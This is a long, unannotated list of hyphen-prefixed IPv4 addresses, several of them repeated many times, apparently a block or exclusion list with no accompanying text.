-117.194.139.47 -117.193.70.20 -41.103.226.20 -117.201.21.255 -45.76.161.13 -41.96.218.69 -117.221.243.185 -45.236.240.90 -117.200.159.187 -117.212.185.210 -117.207.65.234 -177.43.23.55 -172.104.60.88 -187.113.3.247 -197.204.162.42 -189.6.202.6 -115.133.80.104 -196.77.160.237 -45.236.240.90 -45.236.240.90 -41.103.226.20 -186.54.251.192 -195.13.216.117 -190.1.203.16 -179.214.17.190 -45.236.240.90 -103.204.80.206 -197.204.162.42 -93.39.92.169 -201.48.183.144 -189.112.108.201 -45.236.240.90 -41.103.253.237 -45.236.240.90 -179.187.91.237 -179.228.89.177 -60.53.38.114 -191.33.211.241 -177.43.233.31 -149.202.41.22 -185.160.48.228 -182.53.80.113 -216.17.18.154 -40.68.186.66 -160.177.151.59 -40.68.188.230 -3.91.17.155 -117.222.139.132 -202.70.64.172 -93.39.92.171 -188.52.13.19 -189.154.135.175 -13.229.34.124 -197.204.114.224 -201.48.142.88 -131.1.255.145 -45.189.119.97 -190.31.253.244 -175.140.73.12 -107.20.203.11 -3.91.17.155 -45.236.240.90 -54.147.11.217 -45.236.240.90 -189.46.142.191 -201.42.14.166 -54.147.11.217 -171.22.25.127 -45.236.240.90 -45.236.240.90 -202.70.64.172 -75.141.62.6 -179.219.44.249 -179.159.134.195 -18.211.178.157 -83.4.87.16 -217.165.11.51 -179.185.49.98 -170.0.44.245 -197.204.109.235 -177.63.208.171 -41.140.65.144 -177.235.18.216 -170.231.192.208 -64.146.172.55 -113.172.77.240 -52.2.39.162 -175.136.16.173 -79.231.232.133 -191.221.53.39 -52.26.232.177 -179.26.56.180 -20.101.52.139 -200.216.115.18 -188.52.46.10 -179.26.56.180 -189.4.3.169 -177.17.113.197 -45.236.240.90 -186.212.173.158 -168.232.154.33 -201.6.154.216 -122.160.11.12 -61.40.73.182 -41.99.4.208 -186.230.33.170 -179.26.210.246 -124.120.86.91 -45.236.240.90 -177.149.159.184 -179.179.136.69 -186.249.10.118 -177.94.51.146 -45.236.240.90 -50.79.67.9 -45.236.240.90 -45.236.240.90 -196.64.64.123 -171.22.25.127 -75.8.40.170 -52.2.39.162 -177.96.213.92 -167.61.250.133 -157.90.123.211 -177.206.46.233 -201.48.183.97 -181.24.153.55 -179.177.135.121 -162.55.51.57 -18.228.153.180 -177.205.86.144 -41.99.0.175 -189.154.103.140 -41.250.164.62 -177.204.228.70 -18.170.43.223 -45.236.240.90 -191.26.67.173 -12.24.255.160 -45.236.240.90 -45.236.240.90 -179.183.203.72 -177.43.158.84 -54.165.145.88 -177.194.138.118 -3.88.156.100 -192.41.83.132 -187.39.0.82 -187.9.130.253 -40.70.79.242 -177.158.2.155 -45.236.240.90 -187.180.94.96 -63.119.111.138 -180.75.8.67 -41.99.98.0 -45.236.240.90 -45.236.240.90 -18.208.134.114 -207.236.97.194 -179.181.125.122 -179.95.163.145 -110.139.76.92 -196.70.122.252 -187.56.91.112 -3.238.249.51 -45.236.240.90 -13.57.25.6 -201.47.185.228 -201.47.185.229 -45.236.240.90 -187.5.164.23 -45.236.240.90 -189.63.83.175 -191.35.245.92 -63.119.111.138 -180.183.113.25 -138.201.146.244 -179.191.239.123 -45.236.240.90 -45.236.240.90 -78.180.182.108 -45.236.240.90 -189.112.71.105 -177.19.178.158 -149.202.41.22 -200.141.174.132 -177.83.192.99 -5.35.254.187 -45.236.240.90 -79.188.26.226 -177.191.152.45 -45.236.240.90 -186.52.169.101 -164.52.210.96 -75.8.40.170 -103.204.80.206 -177.96.33.180 -200.164.222.162 -45.236.240.90 -45.236.240.90 -52.252.15.96 -191.250.8.43 -177.50.167.234 -187.10.95.215 -45.236.240.90 -171.22.25.127 -177.98.166.29 -44.202.33.132 -45.236.240.90 -45.236.240.90 -200.57.193.154 -3.236.112.37 -107.20.203.11 -72.24.104.202 -34.221.17.123 -66.171.93.30 -69.46.7.35 -12.24.255.161 -82.222.61.132 -45.236.240.90 -203.241.176.196 -13.56.111.247 -125.16.147.96 -200.162.249.105 -179.216.56.14 -24.128.225.157 -201.49.124.155 -45.236.240.90 -201.49.124.154 -186.52.214.82 -201.49.124.157 -105.154.41.58 -193.95.241.68 -60.50.150.223 -175.140.97.174 -195.57.124.107 -117.221.1.224 -112.78.137.130 -49.236.195.87 -179.216.216.17 -177.106.60.177 -177.133.40.148 -45.236.240.90 -45.236.240.90 -88.4.155.175 -45.236.240.90 -45.236.240.90 -177.18.28.202 -200.95.173.138 -189.63.28.62 -82.77.11.169 -45.236.240.90 -34.243.241.116 -187.107.163.32 -187.64.128.165 -190.196.31.142 -179.250.232.239 -45.236.240.90 -45.236.240.90 -45.236.240.90 -45.236.240.90 -191.215.72.162 -179.156.196.50 -3.93.40.34 -45.236.240.90 -170.83.45.98 -191.54.133.72 -45.236.240.90 -88.249.164.79 -45.236.240.90 -117.222.142.81 -177.205.36.140 -191.251.56.23 -179.232.228.235 -179.185.49.98 -181.191.206.66 -113.193.10.224 -171.22.25.127 -45.236.240.90 -41.74.113.50 -191.185.14.91 -180.183.125.5 -45.236.240.90 -207.179.181.43 -41.98.2.43 -179.27.154.9 -202.52.15.82 -41.96.114.23 -189.112.92.89 -41.202.224.20 -152.86.128.135 -177.132.129.117 -202.126.92.235 -201.47.185.227 -189.61.53.13 -159.148.9.245 -88.4.155.211 -191.191.129.94 -117.202.44.109 -179.191.84.154 -45.236.240.90 -50.195.186.85 -117.216.10.148 -45.236.240.90 -171.22.25.127 -189.89.178.102 -179.113.141.72 -189.110.204.37 -109.70.139.71 -201.0.184.29 -45.236.240.90 -201.47.185.230 -201.47.185.226 -122.160.11.12 -45.236.240.90 -179.216.52.180 -189.73.181.136 -45.236.240.90 -159.148.9.245 -189.61.86.54 -45.236.240.90 -115.134.194.193 -167.61.208.27 -109.70.138.242 -81.44.33.253 -13.244.119.137 -207.188.150.68 -186.214.217.80 -177.204.225.44 -189.72.206.146 -162.247.215.74 -13.246.41.100 -66.146.127.10 -177.133.161.133 -45.236.240.90 -117.222.142.3 -208.103.117.29 -117.213.35.114 -179.187.186.251 -117.222.141.84 -117.222.141.102 -59.88.179.47 -117.221.245.121 -59.99.211.51 -117.212.179.107 -117.241.71.212 -117.221.243.235 -117.201.28.189 -117.217.167.102 -59.96.193.239 -59.88.180.71 -37.104.71.43 -52.201.111.92 -59.92.185.231 -117.202.44.47 -117.213.65.235 -171.22.25.127 -117.222.142.189 -117.221.247.170 -59.92.85.8 -66.146.127.27 -117.212.185.69 -45.236.240.90 -59.96.192.221 -186.222.17.9 -117.202.138.46 -117.222.140.138 -117.222.140.153 -117.222.141.47 -3.227.229.41 -59.90.85.145 -59.96.227.101 -59.88.186.200 -124.82.99.141 -59.92.236.184 -117.213.39.192 -181.24.134.126 -117.202.45.2 -117.206.130.31 -117.201.19.173 -167.56.76.207 -59.92.237.15 -117.221.15.69 -167.57.160.59 -117.201.21.184 -117.222.136.178 -177.205.43.200 -194.176.109.158 -41.96.248.171 -66.146.127.27 -124.41.214.49 -3.95.212.40 -216.207.192.150 -103.139.166.21 -180.183.114.165 -195.57.124.107 -149.202.41.22 -179.95.90.30 -52.45.21.72 -196.64.79.184 -3.97.251.249 -200.146.221.156 -164.177.34.101 -191.33.178.210 -186.202.182.191 -109.70.138.236 -12.24.255.163 -202.137.3.247 -12.24.255.165 -12.24.255.167 -45.236.240.90 -177.10.197.141 -45.236.240.90 -54.146.108.165 -191.33.14.225 -189.61.17.231 -201.45.78.146 -110.159.137.31 -36.74.154.234 -66.146.127.10 -54.81.175.67 -3.227.229.41 -54.81.175.67 -202.188.219.216 -3.95.212.40 -194.176.109.158 -177.100.216.167 -177.204.170.4 -47.34.189.157 -124.120.96.7 -45.162.68.29 -41.98.19.160 -45.236.240.90 -171.22.25.127 -177.50.167.42 -160.178.44.148 -142.132.170.212 -179.84.99.210 -45.162.68.29 -12.24.255.162 -203.121.77.230 -167.61.203.173 -45.236.240.90 -179.152.227.125 -94.96.22.2 -13.59.34.78 -177.98.218.188 -211.49.98.67 -45.236.240.90 -187.121.110.227 -45.236.240.90 -201.217.158.170 -45.236.240.90 -177.205.114.137 -187.65.39.163 -185.29.79.192 -179.95.68.253 -138.122.167.5 -45.7.234.12 -217.12.25.37 -64.126.66.211 -186.57.96.91 -193.164.138.11 -191.251.46.145 -66.208.253.177 -45.160.27.92 -3.95.45.247 -52.71.123.26 -45.162.68.29 -180.247.222.173 -45.236.240.90 -117.201.26.213 -89.187.66.108 -117.193.206.171 -66.146.127.27 -117.217.215.179 -59.88.191.62 -117.221.2.141 -117.207.73.2 -45.236.240.90 -200.129.147.21 -60.51.208.108 -59.92.239.243 -117.206.129.247 -117.193.66.96 -117.207.78.32 -117.201.19.102 -117.193.71.42 -186.50.43.181 -117.221.242.111 -117.217.215.21 -186.233.189.22 -117.222.143.45 -59.91.154.50 -35.182.247.116 -117.200.158.104 -117.222.138.177 -117.202.141.112 -103.4.44.163 -117.222.141.152 -117.222.139.184 -59.93.68.50 -59.88.178.35 -117.221.137.234 -59.92.185.63 -41.74.70.14 -59.92.86.63 -117.222.139.123 -186.48.52.67 -117.206.122.167 -59.91.158.91 -117.222.136.206 -59.96.230.99 -117.193.69.18 -117.207.122.83 -186.210.95.229 -59.91.155.215 -45.236.240.90 -117.241.217.227 -59.93.163.243 -179.178.193.211 -117.222.141.164 -117.200.153.176 -117.222.138.197 -117.222.142.73 -14.186.104.237 -59.96.193.250 -191.250.4.199 -59.96.225.86 -117.221.1.173 -117.201.20.168 -61.3.243.115 -3.26.144.140 -59.92.191.121 -117.197.196.163 -59.96.225.69 -117.207.65.209 -117.207.71.89 -117.222.140.214 -177.87.10.187 -175.139.128.121 -41.230.11.126 -45.236.240.90 -216.82.204.206 -185.36.2.7 -180.183.96.131 -183.88.214.182 -3.239.10.72 -66.146.127.10 -191.251.33.158 -51.75.79.185 -177.18.137.19 -3.106.137.242 -96.82.34.250 -189.105.219.58 -189.32.130.135 -44.202.33.132 -45.236.240.90 -124.120.86.116 -187.107.110.66 -45.236.240.90 -45.236.240.90 -186.213.124.53 -45.236.240.90 -190.134.219.75 -187.65.7.158 -200.193.159.153 -191.248.32.114 -45.236.240.90 -120.138.8.73 -187.58.32.45 -191.33.231.108 -212.75.174.210 -179.222.122.126 -201.62.94.146 -201.48.62.9 -45.236.240.90 -41.96.11.115 -117.221.9.211 -45.236.240.90 -69.46.7.35 -177.134.97.126 -186.113.6.89 -41.140.235.143 -179.104.163.87 -45.236.240.90 -45.236.240.90 -94.96.60.112 -45.236.240.90 -105.156.94.192 -115.129.4.24 -201.35.4.71 -190.133.7.189 -79.120.193.70 -41.96.46.148 -41.96.11.115 -34.72.194.131 -175.141.90.189 -117.222.137.144 -183.88.214.182 -177.85.2.80 -45.236.240.90 -117.222.141.73 -175.139.130.60 -213.74.242.18 -138.122.155.187 -42.189.59.178 -13.58.61.61 -45.236.240.90 -200.175.235.147 -34.72.194.131 -115.133.48.197 -100.26.245.113 -160.177.144.127 -45.236.240.90 -191.31.6.84 -45.236.240.90 -81.42.255.38 -58.229.184.214 -37.104.95.183 -196.89.172.53 -41.96.71.16 -41.96.71.16 -177.10.197.141 -13.245.231.239 -45.236.240.90 -117.202.140.197 -186.54.126.80 -83.110.97.171 -201.48.114.12 -138.201.69.178 -37.104.95.183 -41.96.3.123 -186.210.95.152 -167.60.71.70 -177.18.62.97 -52.252.26.222 -45.236.240.90 -41.142.80.12 -41.96.3.123 -179.178.95.77 -193.230.241.11 -191.54.57.172 -175.139.245.32 -116.203.60.15 -45.236.240.90 -181.24.156.88 -177.158.9.21 -179.26.109.141 -186.52.238.33 -121.121.92.40 -171.22.25.127 -179.219.66.207 -183.88.214.182 -183.88.214.182 -45.236.15.205 -45.236.240.90 -41.96.136.110 -41.96.129.220 -177.191.147.65 -115.130.136.20 -52.25.226.33 -34.205.7.5 -189.63.2.37 -195.175.62.226 -54.173.108.44 -34.205.7.5 -196.89.176.59 -50.248.13.180 -201.49.124.156 -41.96.66.19 -143.0.151.115 -190.134.227.121 -187.32.191.208 -94.96.23.20 -196.64.78.138 -179.26.25.111 -41.96.173.168 -13.208.240.214 -45.236.240.90 -45.236.240.90 -183.88.214.182 -23.94.25.186 -45.236.240.90 -177.53.126.206 -45.236.240.90 -45.236.240.90 -72.32.66.27 -72.32.66.26 -45.236.240.90 -177.30.82.95 -45.236.240.90 -183.88.214.182 -36.81.126.42 -115.133.86.90 -115.133.107.250 -183.88.214.182 -191.54.21.133 -183.88.214.182 -118.101.27.147 -189.112.72.168 -191.54.132.177 -105.156.18.227 -59.99.210.197 -181.24.137.178 -117.221.14.15 -167.60.118.212 -97.107.137.71 -186.50.45.108 -59.88.190.34 -117.202.136.89 -59.92.83.165 -117.206.123.157 -117.213.32.15 -117.222.138.11 -117.222.138.43 -117.222.138.7 -117.212.177.15 -117.202.68.125 -117.217.215.225 -117.215.182.246 -117.193.202.132 -61.3.204.24 -117.201.28.84 -117.207.65.184 -59.92.98.142 -117.222.141.80 -117.217.213.108 -60.53.16.197 -117.222.136.9 -117.193.206.174 -117.212.179.52 -117.213.106.88 -117.222.139.33 -117.200.149.217 -117.221.242.13 -117.217.212.105 -117.221.5.237 -117.207.73.170 -59.96.227.230 -59.92.239.131 -45.236.240.90 -204.2.62.60 -117.212.183.143 -59.93.68.22 -59.89.199.43 -59.98.57.93 -117.221.138.120 -59.92.188.231 -191.33.237.57 -117.201.24.149 -45.236.240.90 -179.26.61.169 -13.245.4.86 -117.207.78.191 -117.221.15.52 -186.19.237.235 -167.60.133.132 -117.207.77.164 -117.221.7.238 -117.193.201.133 -59.88.186.188 -59.89.199.187 -41.96.246.46 -117.222.140.250 -117.221.0.157 -190.133.175.162 -45.175.144.135 -92.154.23.19 -41.96.246.46 -59.91.18.154 -183.88.214.182 -45.236.240.90 -105.159.181.207 -196.89.172.61 -179.26.24.73 -94.99.119.147 -118.173.234.218 -45.236.240.90 -45.236.240.90 -88.16.215.88 -45.236.240.90 -187.67.250.176 -189.124.232.27 -183.88.214.182 -117.221.0.197 -138.201.0.109 -117.241.41.72 -179.216.18.42 -183.88.214.182 -183.88.214.182 -183.88.214.182 -167.60.152.85 -190.134.223.141 -186.50.45.91 -200.131.224.16 -94.154.57.21 -175.139.226.136 -41.96.58.134 -190.134.223.141 -138.201.69.176 -41.98.1.119 -3.95.80.38 -191.55.198.152 -180.248.62.48 -162.55.218.31 -50.248.13.180 -201.48.143.150 -202.188.218.216 -195.235.86.49 -146.148.33.251 -177.220.191.202 -76.78.67.27 -200.165.167.51 -45.236.240.90 -177.30.81.135 -183.88.214.182 -45.236.240.90 -177.142.104.146 -59.88.190.72 -59.88.190.33 -177.177.92.144 -12.24.255.164 -138.201.69.181 -138.201.69.183 -34.254.246.199 -189.63.2.54 -187.59.248.85 -52.34.3.44 -189.27.112.177 -45.236.240.90 -177.3.225.165 -183.88.214.182 -189.63.83.130 -203.196.40.169 -45.236.240.90 -45.236.240.90 -179.95.82.9 -191.54.57.155 -45.236.240.90 -179.126.69.0 -45.236.240.90 -188.52.28.39 -183.88.214.182 -179.26.221.42 -44.198.233.87 -41.140.58.206 -188.52.43.49 -179.26.78.15 -41.216.125.150 -177.98.145.43 -41.96.150.134 -183.88.214.182 -103.126.6.236 -191.251.39.144 -45.236.240.90 -177.106.154.33 -179.232.228.235 -183.88.214.182 -13.245.117.201 -171.22.25.127 -187.49.72.215 -115.133.60.234 -59.92.94.148 -45.236.240.90 -132.255.34.159 -183.88.214.182 -196.77.164.38 -82.113.183.58 -183.88.214.182 -171.22.25.127 -179.176.135.216 -23.111.106.183 -189.154.193.67 -183.88.214.182 -13.229.34.124 -138.122.164.23 -191.54.229.124 -60.54.212.75 -79.217.84.250 -41.96.172.17 -41.96.182.44 -117.194.133.154 -201.47.224.156 -117.202.186.141 -167.60.157.232 -200.98.128.77 -186.55.29.50 -177.159.77.244 -117.241.43.168 -175.139.225.174 -37.104.70.227 -117.202.138.123 -200.131.224.16 -59.95.162.66 -117.202.139.201 -117.201.25.143 -117.222.140.164 -186.213.84.170 -61.2.33.100 -61.3.242.102 -45.236.240.90 -117.221.135.255 -117.212.180.199 -35.88.81.165 -117.202.137.114 -59.89.193.95 -59.92.187.21 -177.50.163.25 -117.221.6.166 -117.221.233.243 -89.231.194.18 -183.88.214.182 -41.96.172.17 -117.213.38.21 -45.236.240.90 -59.88.183.126 -59.96.229.147 -117.221.5.36 -117.207.78.94 -117.202.137.171 -117.212.180.108 -186.50.186.55 -117.221.7.145 -117.222.140.54 -117.222.139.244 -117.222.137.230 -117.206.130.35 -177.207.226.250 -117.202.140.71 -117.212.191.164 -117.213.110.165 -117.207.65.186 -181.24.142.220 -117.222.142.26 -59.91.148.182 -117.193.203.190 -117.206.123.26 -117.202.138.73 -59.88.189.175 -117.217.215.236 -191.54.57.209 -117.222.138.69 -59.96.193.148 -105.157.128.155 -117.217.215.237 -177.159.196.134 -59.91.144.111 -117.213.32.193 -117.194.134.86 -61.3.205.5 -59.92.81.1 -41.96.207.173 -96.77.104.46 -187.60.237.163 -186.55.29.50 -106.201.236.206 -183.88.214.182 -59.91.20.238 -45.236.240.90 -80.15.195.109 -124.120.143.243 -45.236.240.90 -103.211.80.23 -183.88.214.182 -183.88.214.182 -183.88.214.182 -45.236.240.90 -201.48.182.186 -200.165.167.51 -183.88.60.75 -45.236.240.90 -3.93.110.240 -82.113.183.57 -46.186.44.174 -191.31.77.227 -152.228.220.233 -45.236.240.90 -177.132.181.128 -13.245.6.3 -183.88.214.182 -200.150.180.204 -177.132.225.14 -189.110.241.184 -183.88.214.182 -191.31.104.63 -179.95.115.198 -115.133.70.27 -191.35.254.164 -36.84.189.161 -160.179.86.230 -183.88.214.182 -191.251.37.32 -200.129.102.29 -45.236.240.90 -200.98.200.220 -200.98.201.70 -183.88.214.182 -190.113.232.231 -187.57.13.225 -89.231.198.246 -46.186.47.205 -183.88.214.182 -45.236.240.90 -59.91.16.245 -45.236.240.90 -41.96.34.54 -179.26.49.34 -179.67.95.218 -183.88.214.182 -177.50.168.42 -186.52.161.217 -200.98.161.94 -45.236.240.90 -191.54.133.37 -177.69.90.41 -179.26.238.25 -41.96.126.63 -45.184.68.166 -92.223.184.229 -41.96.115.10 -200.129.179.235 -13.234.38.170 -186.214.217.75 -45.236.240.90 -175.145.109.55 -13.245.108.212 -87.240.222.166 -54.75.168.58 -117.241.40.195 -61.0.121.221 -117.222.140.32 -189.154.87.114 -59.96.224.25 -117.221.246.251 -179.24.214.107 -181.24.143.252 -117.197.193.145 -200.187.169.29 -132.247.197.92 -177.50.178.33 -59.91.155.43 -117.202.78.98 -200.98.130.101 -117.207.77.221 -117.213.71.115 -117.201.26.248 -94.99.111.20 -45.236.240.90 -195.28.79.36 -117.202.138.104 -45.236.240.90 -130.255.92.3 -41.39.207.194 -45.236.240.90 -179.26.28.185 -45.236.240.90 -189.63.83.164 -183.88.214.182 -183.88.214.182 -167.56.102.151 -191.250.61.172 -177.159.132.87 -186.50.99.235 -78.141.134.124 -41.96.31.132 -15.206.80.82 -41.224.247.158 -183.88.214.182 -168.228.181.189 -66.216.155.84 -200.146.241.193 -181.15.118.2 -45.236.240.90 -188.19.13.70 -124.120.143.156 -191.31.19.223 -201.57.121.26 -190.112.56.10 -45.236.240.90 -179.181.8.67 -179.182.143.199 -66.216.155.84 -187.115.227.149 -180.253.91.202 -65.124.130.211 -200.98.142.57 -102.53.51.14 -183.88.214.182 -212.67.44.184 -200.98.201.71 -200.98.66.174 -179.104.162.186 -200.98.130.101 -132.247.197.92 -115.135.229.17 -103.234.186.83 -177.106.94.156 -37.104.66.120 -200.165.167.51 -149.202.41.22 -183.88.214.182 -183.88.214.182 -45.236.240.90 -41.96.150.154 -41.96.70.58 -177.206.142.56 -183.88.214.182 -179.104.167.112 -200.98.200.108 -200.98.69.209 -186.214.242.50 -45.236.240.90 -41.96.206.126 -13.57.219.74 -45.236.240.90 -41.96.228.62 -87.120.225.12 -3.13.79.235 -96.75.238.1 -179.97.97.169 -45.236.240.90 -183.88.214.182 -171.22.25.127 -189.206.226.10 -157.175.43.200 -45.236.240.90 -201.11.18.253 -45.236.223.85 -183.88.214.182 -82.114.168.10 -183.88.214.182 -171.22.25.127 -191.220.45.71 -96.38.246.154 -191.54.225.148 -181.24.156.16 -179.24.212.121 -187.65.232.162 -183.88.214.182 -191.54.128.227 -117.221.4.50 -177.191.2.48 -41.96.86.234 -195.201.78.170 -167.56.58.127 -45.236.240.90 -70.25.34.211 -189.231.121.2 -45.236.240.90 -117.206.130.19 -187.59.225.209 -117.241.41.124 -177.132.231.67 -179.24.164.66 -201.47.223.26 -117.212.191.53 -177.96.209.5 -183.88.214.182 -183.88.214.182 -117.202.143.238 -167.57.230.106 -105.154.42.104 -59.89.194.124 -195.167.92.234 -196.218.245.44 -186.48.43.73 -45.236.240.90 -41.140.81.226 -59.92.94.0 -118.101.246.180 -45.236.240.90 -177.50.170.68 -186.218.200.80 -189.38.188.94 -187.74.114.104 -177.204.32.88 -183.88.214.182 -183.88.214.182 -183.88.214.182 -177.157.79.153 -191.217.188.147 -45.236.240.90 -179.178.207.68 -203.77.233.167 -45.236.240.90 -45.236.240.90 -45.236.240.90 -52.203.68.164 -13.244.104.201 -191.31.9.202 -183.88.214.182 -212.78.97.149 -212.78.97.155 -201.42.181.55 -45.236.240.90 -201.87.109.192 -54.38.80.23 -66.216.9.195 -80.190.64.5 -42.189.38.165 -13.244.157.174 -187.18.163.210 -115.133.70.105 -52.203.68.164 -45.236.240.90 -105.156.68.57 -35.226.87.181 -45.236.240.90 -83.249.25.215 -41.96.39.67 -210.116.109.170 -191.33.8.158 -41.96.22.188 -201.47.199.154 -13.229.34.124 -94.99.108.148 -189.114.0.179 -41.142.227.150 -192.149.255.21 -186.54.247.93 -212.78.97.155 -212.78.97.149 -212.78.97.150 -89.231.195.233 -171.97.53.247 -179.26.27.78 -45.236.240.90 -177.209.88.178 -179.110.157.19 -200.187.171.50 -181.206.14.31 -186.210.91.29 -186.211.75.238 -187.112.47.62 -45.236.240.90 -177.106.59.234 -191.250.1.74 -45.236.240.90 -200.187.60.170 -61.3.197.187 -170.76.160.60 -216.207.192.133 -183.88.214.182 -13.229.34.124 -200.194.172.19 -201.16.184.152 -183.88.214.182 -45.236.240.90 -201.68.229.40 -117.213.37.142 -183.88.214.182 -183.88.214.182 -45.236.240.90 -191.35.255.254 -45.236.240.90 -191.31.26.165 -171.22.25.127 -186.193.181.120 -179.126.74.81 -179.104.164.154 -181.24.153.41 -167.60.76.92 -190.15.17.8 -2.89.104.98 -41.96.161.186 -115.134.194.218 -189.63.222.107 -117.201.30.195 -175.139.209.97 -117.197.203.151 -186.52.197.24 -117.221.11.18 -59.92.93.182 -117.213.76.102 -191.55.197.187 -117.217.213.49 -117.201.20.89 -117.194.140.208 -117.212.186.65 -59.92.91.126 -59.88.187.240 -105.155.102.130 -117.202.67.202 -117.213.33.10 -59.92.84.216 -117.197.202.88 -59.96.193.136 -201.6.101.183 -59.90.85.52 -117.207.79.166 -117.221.3.99 -69.46.7.35 -190.147.238.69 -45.236.240.90 -177.50.178.215 -179.186.32.196 -177.133.51.10 -200.181.189.23 -187.39.28.56 -121.121.90.221 -45.236.240.90 -186.210.87.111 -200.187.60.222 -200.187.60.176 -45.236.240.90 -200.187.60.111 -183.88.214.182 -200.187.13.104 -31.199.12.148 -177.205.80.190 -200.187.60.114 -200.187.4.8 -187.121.103.205 -200.187.60.104 -200.187.60.77 -191.55.192.167 -189.27.125.242 -189.59.212.161 -183.88.214.182 -191.184.231.172 -102.53.49.6 -201.22.182.46 -69.164.109.144 -103.106.21.154 -200.179.75.143 -44.202.105.202 -210.213.238.98 -45.236.240.90 -144.76.112.246 -45.236.240.90 -41.96.40.89 -187.66.155.247 -94.96.6.36 -189.112.49.224 -179.26.45.231 -186.48.158.184 -196.65.88.228 -41.98.15.132 -188.52.37.23 -175.141.26.159 -179.162.160.109 -167.57.181.230 -45.236.240.90 -177.133.245.30 -200.174.126.167 -179.187.252.202 -191.187.123.252 -183.88.214.182 -94.99.104.172 -138.0.125.32 -212.78.97.152 -82.147.57.110 -47.34.189.158 -200.187.60.123 -187.121.13.66 -186.55.13.55 -187.8.223.70 -37.104.103.208 -41.96.120.147 -200.187.60.12 -191.54.130.148 -200.187.60.175 -200.187.4.40 -177.45.80.151 -187.36.227.165 -41.96.120.147 -41.98.15.132 -179.159.145.137 -182.73.135.130 -179.126.7.120 -171.22.25.127 -125.27.230.60 -104.156.56.44 -179.24.161.141 -41.96.116.40 -179.98.207.109 -45.236.240.90 -13.208.121.17 -183.88.214.182 -94.140.123.36 -45.236.240.90 -183.88.214.182 -45.236.240.90 -177.133.61.242 -201.95.192.51 -179.126.4.112 -183.88.214.182 -45.236.240.90 -201.29.71.97 -187.122.238.152 -187.19.165.125 -88.4.154.115 -177.157.85.86 -45.236.240.90 -45.236.240.90 -191.31.16.141 -177.132.250.193 -187.87.39.39 -177.63.232.247 -177.158.6.34 -186.213.212.122 -187.115.174.44 -183.88.214.182 -179.187.37.219 -45.4.144.96 -177.16.198.137 -41.96.79.75 -179.178.228.193 -54.64.241.63 -183.88.214.182 -190.133.161.254 -186.210.90.31 -196.65.92.78 -60.49.103.208 -189.112.151.137 -41.98.25.249 -167.60.7.204 -177.42.53.207 -85.121.32.35 -2.89.80.31 -201.86.224.237 -138.122.164.166 -45.236.240.90 -171.22.25.127 -59.91.144.79 -191.35.52.192 -190.137.11.247 -45.236.240.90 -94.96.21.251 -45.236.240.90 -41.96.109.103 -59.92.181.6 -167.61.204.181 -117.221.233.78 -117.221.242.52 -186.57.112.229 -59.92.103.226 -117.221.12.186 -45.236.240.90 -117.197.205.169 -117.221.0.123 -191.54.142.167 -117.197.198.178 -191.45.37.91 -117.221.240.41 -117.213.32.244 -59.91.151.175 -117.221.240.172 -183.88.214.182 -179.84.69.195 -189.5.145.220 -45.236.240.90 -183.88.214.182 -177.134.174.155 -212.78.97.150 -191.251.46.39 -105.159.182.11 -45.236.240.90 -103.19.199.158 -213.240.141.220 -212.78.97.152 -198.51.63.156 -177.47.145.33 -187.86.212.136 -213.240.141.206 -183.88.214.182 -187.86.212.153 -212.198.251.245 -216.207.192.32 -35.169.8.251 -45.236.240.90 -183.88.214.182 -61.5.124.192 -175.136.214.71 -20.121.11.213 -170.80.70.18 -91.221.50.122 -191.33.163.173 -183.88.214.182 -117.241.42.34 -179.26.145.6 -175.139.40.83 -186.210.25.54 -191.33.94.163 -35.209.72.20 -41.96.184.105 -45.236.240.90 -200.142.121.214 -187.107.178.188 -183.88.214.182 -179.24.238.234 -41.202.224.20 -94.96.21.251 -179.24.234.92 -183.88.214.182 -46.186.40.62 -171.97.53.201 -189.79.118.148 -177.126.78.19 -41.96.4.103 -45.236.240.90 -183.88.214.182 -41.74.188.195 -54.162.98.33 -189.110.88.80 -179.187.204.125 -201.34.143.113 -59.92.187.121 -179.181.80.83 -200.175.247.212 -45.236.240.90 -78.30.57.2 -183.88.214.182 -168.205.38.208 -86.98.152.125 -186.251.79.39 -183.88.214.182 -190.133.250.25 -212.75.174.200 -194.236.6.234 -212.75.174.211 -201.33.200.162 -179.162.79.112 -186.57.104.130 -177.75.184.161 -187.44.93.107 -201.87.106.193 -191.250.52.13 -179.26.64.70 -187.95.103.141 -179.180.206.160 -177.75.184.170 -41.96.44.124 -187.113.32.129 -183.88.214.182 -177.50.162.79 -179.158.237.161 -177.222.146.17 -41.96.252.245 -191.250.10.114 -101.50.62.61 -108.160.176.33 -108.160.176.2 -167.60.41.150 -195.57.30.9 -85.171.185.53 -41.142.234.252 -2.50.25.210 -187.39.93.85 -102.53.60.35 -183.88.214.182 -191.54.129.127 -179.162.204.109 -15.152.36.61 -34.245.104.173 -160.177.149.120 -183.88.214.182 -179.176.119.72 -2.89.95.68 -190.134.1.198 -2.89.85.35 -41.96.88.117 -189.110.88.106 -200.117.153.147 -177.96.55.27 -34.205.159.126 -189.27.6.108 -185.210.127.20 -179.104.163.94 -179.183.36.82 -105.158.76.218 -175.140.72.121 -125.27.192.151 -191.33.114.101 -189.27.29.175 -179.199.5.195 -45.236.240.90 -179.219.45.0 -3.26.201.183 -45.236.240.90 -41.141.82.238 -41.98.115.21 -124.13.22.248 -45.236.240.90 -183.88.214.182 -179.247.132.77 -183.88.214.182 -179.104.167.94 -201.48.102.202 -177.18.222.79 -59.89.206.222 -189.26.221.26 -186.48.130.197 -187.21.231.163 -41.98.115.21 -177.159.135.147 -41.96.147.42 -186.52.140.58 -59.96.227.252 -187.58.34.124 -59.92.103.191 -110.159.240.116 -117.202.73.35 -59.88.177.158 -59.96.53.247 -61.3.194.178 -59.92.92.255 -117.221.5.160 -117.213.68.145 -59.92.176.113 -186.57.89.121 -117.200.158.47 -117.201.20.255 -59.88.190.129 -117.241.78.29 -117.206.130.101 -179.98.25.159 -117.212.187.59 -117.222.136.88 -201.6.149.109 -183.88.214.182 -105.157.121.101 -186.212.88.219 -187.86.212.156 -187.59.251.70 -177.158.31.49 -87.190.252.60 -179.26.35.61 -121.122.124.25 -189.73.181.166 -175.140.73.40 -41.140.191.180 -191.54.131.26 -36.81.170.36 -179.179.154.129 -86.242.65.58 -58.71.206.232 -177.75.184.160 -102.53.57.140 -201.33.195.150 -177.189.207.155 -45.236.240.90 -45.236.240.90 -183.88.214.182 -86.242.65.58 -85.13.244.246 -171.22.25.127 -183.88.214.182 -175.136.235.86 -41.96.101.167 -177.52.212.146 -41.96.244.58 -186.57.87.108 -186.210.91.114 -207.253.15.193 -167.60.39.201 -37.104.64.221 -52.73.104.74 -219.92.154.212 -194.176.109.178 -186.50.41.114 -34.231.31.252 -179.183.100.51 -86.98.27.205 